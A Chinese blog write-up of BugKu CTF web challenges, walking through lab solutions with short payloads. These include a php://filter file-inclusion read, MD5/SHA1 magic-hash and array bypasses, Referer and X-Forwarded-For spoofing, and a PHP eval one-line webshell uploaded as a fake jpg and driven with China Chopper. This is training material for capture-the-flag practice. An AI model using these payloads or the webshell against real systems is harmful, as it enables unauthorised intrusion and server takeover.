CTF BugKu平台———(Web篇②)

简介: CTF BugKu平台———(Web篇②)总结

源代码:

在这里插入图片描述
unescape编码:https://tool.chinaz.com/Tools/Escape.aspx

PS:p1+'%35%34%61%61%32' + p2 然后提交即可

67d709b2b54aa2aa648cf6e87a7114f1
在这里插入图片描述

文件包含:

在这里插入图片描述

file=php://filter/read=convert.base64-encode/resource=index.php  #构造pyload

在这里插入图片描述

好像需要密码:

在这里插入图片描述
bp爆破密码:12468
在这里插入图片描述

备份是个好习惯:

在这里插入图片描述
在这里插入图片描述

有一串字符串 提示给的是备份 那就是找bak文件 尝试 index.php.bak 下载下来一个文件

在这里插入图片描述

**大概的意思是将get的两个参数中的key替换为空,然后对key1,key2的值进行md5加密,
如果md5加密的值一样而未加密的值不同,就输出flag.**

MD5绕过:
下列的字符串的MD5值都是0e开头的:

QNKCDZO

240610708

s878926199a

s155964671a

s214587387a

s214587387a

pyload:http://114.67.175.224:10088/?kekeyy1=QNKCDZO&kekeyy2=240610708
在这里插入图片描述

shell:

在这里插入图片描述
在这里插入图片描述

cookies:

http://114.67.175.224:18865/index.php?line=&filename=a2V5cy50eHQ=
line : 可能是个列的参数意思 "a2V5cy50eHQ=" base64解码得到 “keys.txt”

在这里插入图片描述
在这里插入图片描述

前女友:

F12 查看源码发现了一个code.txt
在这里插入图片描述

<?php
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){
    $v1 = $_GET['v1'];
    $v2 = $_GET['v2'];
    $v3 = $_GET['v3'];
    if($v1 != $v2 && md5($v1) == md5($v2)){
        if(!strcmp($v3, $flag)){
            echo $flag;
        }
    }
}
?>

大概的意思就是v1不等于v2,v1和v2的md5相等,strcmp是比较字符串(区分大小写),v3不等于flag。
payload:http://114.67.175.224:10561/?v1[]=1&v2[]=2&v3[]=1
在这里插入图片描述

你从哪里来

在这里插入图片描述
直接bp抓包伪造refererReferer:https:www.google.com
在这里插入图片描述

MD5:

在这里插入图片描述
让我们输入一个a 然后输入:s155964671a (考的MD5碰撞,网上有很多随便找一个即可。)
在这里插入图片描述
在这里插入图片描述

程序员本地网站:

在这里插入图片描述
直接bp抓包 然后添加一条:X-Forwarded-For: 127.0.0.1 即可获取flag。
在这里插入图片描述

各种绕过哟:

在这里插入图片描述

<?php
highlight_file('flag.php');
$_GET['id'] = urldecode($_GET['id']);
$flag = 'flag{xxxxxxxxxxxxxxxxxx}';
if (isset($_GET['uname']) and isset($_POST['passwd'])) {
    if ($_GET['uname'] == $_POST['passwd'])

        print 'passwd can not be uname.';

    else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin'))

        die('Flag: '.$flag);

    else

        print 'sorry!';

}
?>

大概就是使uname的sha1和值与passwd的sha1的值相等即可,但是同时他们两个的值又不能相等。
payload:http://114.67.175.224:12978/?uname[]=1&id=margin

在这里插入图片描述
在这里插入图片描述

file_get_contents:

<?php
extract($_GET);
if (!empty($ac))
{
$f = trim(file_get_contents($fn));
if ($ac === $f)
{
echo "<p>This is flag:" ." $flag</p>";
}
else
{
echo "<p>sorry!</p>";
}
}
?>

方法1:代码审计一下 使用php://input伪协议绕过(需要抓包)
方法2 :根据if($ac === $f),构造?fn=flag.txt,&ac=bugku,最后得到flag
payload:http://114.67.175.224:16481/?&ac=bugku&fn=flag.txt
在这里插入图片描述
在这里插入图片描述

需要管理员:

在这里插入图片描述
使用御剑扫一下后台:robots.txt 访问一下看看 然后定义了一个传入的参数x,但是并没有告诉这个x应该是什么值 提示是管理员试一下是不是admin 构造payload:http://114.67.175.224:15572/resusl.php?x=admin
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
flag{7e69cdda3cf5c4dc101497149af576a8}

## 文件包含2:
在这里插入图片描述
先F12看一下源码 发现了一个upload.php 传一句话密码格式改为jpg 然后使用bp进行修改 最后菜刀连接
在这里插入图片描述
在这里插入图片描述

<script language="php">@eval($_POST[pass])</script>

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
找了一下flag 在/根目录下 :flag{994b40acc26842efb530b6fbc99112b0}
在这里插入图片描述

getshell:

在这里插入图片描述

具体可以看这篇,因为工具需要会员
在这里插入图片描述

至此web篇就先跟新到这里了 最近比较忙没时间肝了,希望对大家有所帮助感谢大家!!

相关文章
|
16天前
|
Unix Linux PHP
PHP在Web开发中的平台独立性优势###
本文探讨了PHP的跨平台特性,阐述其作为服务器端脚本语言如何在不同操作系统上无缝运行,以及这一特性为开发者和组织带来的便利性和成本效益。 ###
|
20天前
|
缓存 安全 JavaScript
PHP在Web开发中的平台优势与未来趋势###
【10月更文挑战第21天】 PHP,Hypertext Preprocessor,凭借其灵活性、广泛应用和强大社区支持,已成为Web开发的常青树。本文探讨了PHP的发展历程、核心优势、最佳实践案例及面临的挑战与机遇,揭示其在现代Web开发中不可替代的角色,以及如何适应未来技术趋势,持续引领Web创新。 ###
34 2
|
26天前
|
设计模式 PHP 开发者
PHP在Web开发中的平台优势与未来展望###
【10月更文挑战第17天】 本文探讨了PHP作为服务器端脚本语言在Web开发领域的持久魅力与独特优势,从其易于学习、成本效益高、强大社区支持到灵活的框架生态,展现了PHP为何能在全球网站开发中占据重要地位。同时,文章也展望了PHP在未来技术趋势下,如云计算、微服务架构中的发展潜力,强调持续创新对于保持其竞争力的重要性。 ###
30 2
|
3月前
|
PHP 数据安全/隐私保护
*CTF 2023 web jwt2struts 题解wp
*CTF 2023 web jwt2struts 题解wp
24 4
|
5月前
|
机器学习/深度学习 人工智能 Apache
人工智能平台PAI操作报错合集之alink任务可以在本地运行,上传到flink web运行就报错,如何解决
阿里云人工智能平台PAI (Platform for Artificial Intelligence) 是阿里云推出的一套全面、易用的机器学习和深度学习平台,旨在帮助企业、开发者和数据科学家快速构建、训练、部署和管理人工智能模型。在使用阿里云人工智能平台PAI进行操作时,可能会遇到各种类型的错误。以下列举了一些常见的报错情况及其可能的原因和解决方法。
|
6月前
|
SQL XML 安全
BugKu CTF(Web):sqli-0x1 & baby lfi & baby lfi 2
BugKu CTF(Web):sqli-0x1 & baby lfi & baby lfi 2
|
6月前
|
域名解析 Linux PHP
[CTF]ctfshow web入门
[CTF]ctfshow web入门
|
1月前
|
XML JSON API
ServiceStack:不仅仅是一个高性能Web API和微服务框架,更是一站式解决方案——深入解析其多协议支持及简便开发流程,带您体验前所未有的.NET开发效率革命
【10月更文挑战第9天】ServiceStack 是一个高性能的 Web API 和微服务框架,支持 JSON、XML、CSV 等多种数据格式。它简化了 .NET 应用的开发流程,提供了直观的 RESTful 服务构建方式。ServiceStack 支持高并发请求和复杂业务逻辑,安装简单,通过 NuGet 包管理器即可快速集成。示例代码展示了如何创建一个返回当前日期的简单服务,包括定义请求和响应 DTO、实现服务逻辑、配置路由和宿主。ServiceStack 还支持 WebSocket、SignalR 等实时通信协议,具备自动验证、自动过滤器等丰富功能,适合快速搭建高性能、可扩展的服务端应用。
100 3
|
15天前
|
设计模式 前端开发 数据库
Python Web开发:Django框架下的全栈开发实战
【10月更文挑战第27天】本文介绍了Django框架在Python Web开发中的应用,涵盖了Django与Flask等框架的比较、项目结构、模型、视图、模板和URL配置等内容,并展示了实际代码示例,帮助读者快速掌握Django全栈开发的核心技术。
102 44
|
11天前
|
前端开发 API 开发者
Python Web开发者必看!AJAX、Fetch API实战技巧,让前后端交互如丝般顺滑!
在Web开发中,前后端的高效交互是提升用户体验的关键。本文通过一个基于Flask框架的博客系统实战案例,详细介绍了如何使用AJAX和Fetch API实现不刷新页面查看评论的功能。从后端路由设置到前端请求处理,全面展示了这两种技术的应用技巧,帮助Python Web开发者提升项目质量和开发效率。
26 1

热门文章

最新文章